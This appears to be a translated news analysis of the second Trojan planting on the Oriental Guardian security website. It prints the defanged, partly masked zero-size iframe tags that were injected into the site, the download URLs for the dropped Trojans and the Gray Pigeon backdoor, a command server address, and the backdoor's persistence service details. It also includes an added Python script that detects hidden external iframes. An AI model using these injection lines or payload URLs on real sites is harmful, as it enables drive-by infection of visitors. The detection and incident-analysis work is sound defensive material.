Oriental Guardian planted with a Trojan again: who ensures the security of security websites?

Source: Internet
Author: User
Keywords: security, iframe src
Editor's note: For security purposes, "http" has been replaced with "hxxp" and "<>" with "[]".

"Two days ago, a netizen reported that the well-known security site Oriental Guardian had once again been planted with a Trojan horse; this is the second time the Oriental Guardian has exposed a security risk."

Recall the earlier incident in which the Oriental Guardian website (hxxp://www.i110.com) referenced malicious code: a user who had not installed the Microsoft MS07-004 patch and visited the page above with the IE browser would be infected with the Trojan.

Technical analysis:

1. The code of the Oriental Guardian website contains a reference to a malicious web page:

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

(Figure 1)

2. The referenced malicious web page contains code that exploits the MS07-004 vulnerability, causing the system to automatically download hxxp://***.ch/xia.exe (TROJAN-DOWNLOADER.WIN32.AGENT.DDZ) to the local machine and run it.

3. xia.exe is a Trojan downloader. It copies itself to the %system32% directory under the name Wdfmg1r32.exe and, once running, downloads the Gray Pigeon virus hxxp://***.li/2.exe (BACKDOOR.WIN32.HUPIGON.CPB).

4. 2.exe is the latest variant of the Gray Pigeon virus, written with rootkit techniques to hide its process. It copies itself to the %system32% directory as System32.exe, releases a file to %windir%\svchost.exe (file size 381440 bytes), and creates the following service:

Service name: Net work Nois
Service description: Net work Nois
Service program: C:\WINNT\svchost.exe

It also downloads hxxp://lxn2wyf8899.3322.org/ip.txt to the local system temp directory.
ip.txt contains the following: hxxp://221.215.170.192:5600/wwwroot/ (the IP address belongs to a Netcom ADSL line in Licang District, Qingdao, Shandong Province).

An infected computer falls under the full remote control of the attacker; the possible operations include arbitrary file operations, registry operations, keystroke logging, downloading and executing remote programs, arbitrary network operations, and even remotely switching on the camera for surveillance.

I. Planted with a Trojan again

This time, on the Oriental Guardian homepage, viewing the page source shows that an "[iframe src=" directive has been inserted into the page. It covertly opens a new page, which forges the browser's "page cannot be opened" error page while covertly opening three further pages in the background that download Trojans.

Code that opens the hidden page:

[iframe src=hxxp://www.****.cn/33/reflector/index.htm width=0 height=0 frameborder=0][/iframe]

The three web pages opened by the forged error page:

[iframe src="hxxp://www.****.cn/33/reflector/4.htm" width="0" height="0" frameborder="0"][/iframe]
[iframe src="hxxp://www.****.cn/33/reflector/2.htm" width="0" height="0" frameborder="0"][/iframe]
[iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"][/iframe]

Trojans downloaded:

hxxp://www.****.cn/33/reflector/1.exe (invalid)
hxxp://www.*****.com/0.exe

(Figure 2)

(Figure 3)

II. Will there be a third time?

As the saying goes, "once and again, but not a third time." As a pioneer among security websites, its credibility and influence in the eyes of its users are extremely high, and the harm caused by any negligence on its part far exceeds the damage done by the Trojan itself.
After the first Trojan-planting incident on the site, I believe the Oriental Guardian should have taken corresponding measures. But the fact that the Trojan-planting incident could happen again should arouse our vigilance and reflection. The second planting shows that in the struggle between "spear" and "shield", the "spear" has once again gained the upper hand. At the same time, that the Oriental Guardian site was planted with a Trojan once and then again suggests that, besides vulnerabilities in the system itself that have still not been found, its own website security monitoring must also have exploitable defects. In previous articles we mentioned that CNN had been hit by a "worm that could have been detected in time" because it failed to update its antivirus software in time. "Spear" and "shield" always coexist; it is impossible for one to completely overshadow the other. Either both coexist or both disappear. In other words, the two Trojan plantings happened not only because a new "spear" appeared, but also because there was a hole in the "shield" for the "spear" to exploit. Mistakes and problems are not frightening; what is frightening is not knowing how the problem arose, and not knowing how to prevent it from recurring.

A security website represents not only a company or a group; it is the front line of the cyber-security struggle. When it cannot guarantee its own security, how are ordinary users to face an increasingly dangerous network world, and how are they to know who can help them fend off network threats? When the security website is knocked down, whom can we trust? Who is going to ensure the security of security websites?

Related information

MS07-004 vulnerability: the Vector Markup Language (VML) support in multiple versions of Microsoft operating systems contains an integer overflow that a remote attacker can exploit to take control of the user's machine.
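Both incidents above share one signature in the page source: an iframe sized to zero (or otherwise invisible) whose src points at a host other than the site's own. The following script is an added example, not code from the article or from Oriental Guardian, showing how a site owner can scan their own pages for that signature as a content-integrity check. The sample HTML and the hostnames malicious.example, partner.example and www.example-site.test are constructed; the real injected hosts are masked in the article and are not reproduced. Because the check only parses the URL's host part, defanged "hxxp://" indicators such as those quoted above can be fed to it unchanged.

```python
"""Scan page HTML for hidden iframes that load content from an external host.

Added example (not the article's or Oriental Guardian's code). All sample
markup and hostnames below are constructed for the demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag in the page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # attrs is a list of (name, value); value is None for bare attributes
            self.iframes.append({name: (value or "") for name, value in attrs})


def _dimension_is_zero(value):
    """True for width/height values such as 0, "0", 0px or 0%."""
    v = value.strip().lower().rstrip("px%").strip()
    try:
        return float(v) <= 0
    except ValueError:
        return False


def _is_hidden(attrs):
    """An iframe sized to nothing or styled invisible renders nothing to the user."""
    if _dimension_is_zero(attrs.get("width", "")) or _dimension_is_zero(attrs.get("height", "")):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def audit_iframes(html, site_host):
    """Return one finding per iframe: its src, host, and external/hidden flags."""
    collector = _IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname  # None for relative URLs such as /ads/banner.html
        findings.append({
            "src": src,
            "host": host,
            "external": host is not None and host.lower() != site_host.lower(),
            "hidden": _is_hidden(attrs),
        })
    return findings


def find_injected_iframes(html, site_host):
    """The injection signature seen in both incidents: a hidden iframe loading an external host."""
    return [f["src"] for f in audit_iframes(html, site_host) if f["hidden"] and f["external"]]


# Constructed sample page: one legitimate relative frame, one visible partner
# frame, and three hidden external frames modelled on the injected ones.
SAMPLE_PAGE = """
<html><head><title>constructed sample</title></head><body>
<h1>Homepage</h1>
<iframe src="/ads/banner.html" width="468" height="60"></iframe>
<iframe src="http://malicious.example/ook.html" width=0 height=0></iframe>
<iframe src="http://malicious.example/33/reflector/index.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://partner.example/widget.html" width="300" height="250"></iframe>
<iframe src="http://malicious.example/hidden.htm" style="display:none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_iframes(SAMPLE_PAGE, "www.example-site.test"):
        flag = "INJECTED?" if finding["hidden"] and finding["external"] else "ok"
        print(f"{flag:10} hidden={finding['hidden']!s:5} external={finding['external']!s:5} {finding['src']}")
```

Run against a copy of each published page (for example from a periodic crawl of the site), a non-empty result from find_injected_iframes is the cue to compare the page with the version in source control; a visible external frame is reported but not flagged, since partner widgets are normal and the zero-size or display:none trick is what distinguishes the injection.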
Oriental Guardian: Chiao Tung University Information Security Company, a well-known information security company that provides the "Oriental Guardian" series of anti-virus products, data protection products, virus-free gateway products, anti-spam products, network equipment and system integration, and OEM customized services.

Responsible editor: Snowflake. TEL: (010) 68476606-8008